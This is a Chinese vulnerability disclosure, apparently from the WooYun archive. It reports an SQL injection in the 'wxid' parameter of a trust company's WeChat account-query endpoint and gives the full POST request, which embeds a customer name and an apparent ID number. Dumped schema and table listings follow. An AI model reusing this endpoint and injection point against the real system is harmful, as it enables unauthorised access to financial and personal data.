乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-08: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-22: 厂商已经主动忽略漏洞,细节向公众公开
爱建信托
微信端 关注 爱建信托点击到账查询然后登录抓包拿到一个post连接
http://vip1.gaotime.com/info-weixinAdmin/accountQueryInfo.do (POST)wxid=82976&custumerName=%E7%8E%8B%E5%B8%85&custumerId=110000197605260652
wxid存在sql注入
涉及到25个数据库
[*] APEX_030200[*] APPQOSSYS[*] CENTER_ADMIN[*] CENTER_CNLIST[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_FILES[*] JRGAZX[*] MDSYS[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] OWBSYS[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TZZH[*] VIP_SYSTEM[*] WEIXIN[*] WMSYS[*] XDB[*] XHJHK
看下这个CENTER_ADMIN涉及到的信息都是百万乃至千万的
Database: CENTER_ADMIN+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| INX_COMPONENTWEIGHT | 30772918 || MED_MACROVALUE | 13988552 || BND_VALUATION | 9668978 || RPT_PERFORMANCEFORECAST | 7966170 || HK_DAILYQUOTE | 5702596 || STK_DAILYQUOTEINDEX | 5064569 || RPT_EARNINGFORESTAT | 4738807 || RPT_COMPOSITERATING | 4217399 || INX_DAILYQUOTE | 3921276 || MGN_DEPOSIT | 2981177 || STK_DAILYQUOTEFA | 2918731 || STK_DAILYQUOTEFA_NEW | 2758985 || BND_DAILYQUOTE | 2687556 || FND_NETASSETVAL | 2655189 || FND_NAVINDEX | 2653553 || RPT_EARNINGFORECAST | 1909577 || IND_VALUE_COMPOSITE | 1898469 || INX_DAILYQUOTEINDEX | 1816670 || FND_MANAGERSECYIELD | 1769921 || AFT_MMZB | 1677754 || STK_THREEMARKETQUOTEDETAIL | 1593919 || COM_SHAREHOLDER | 1579059 || FUT_CFDAILYQUOTE | 1550740 || MED_INDEXCATALOG | 1543069 || FND_SECUPORTFOLIO | 1535534 || COM_EQUITYCHANGENAS | 1516609 || BND_CONVERSIONRATE | 1486816 || STK_MONEYFLOWDAILY | 1371650 || CAM_NETASSETVAL | 1105708 || CAM_NAVINDEX | 1072657 |
大量数据库 不再一一列举 请厂商自查
过滤
未能联系到厂商或者厂商积极拒绝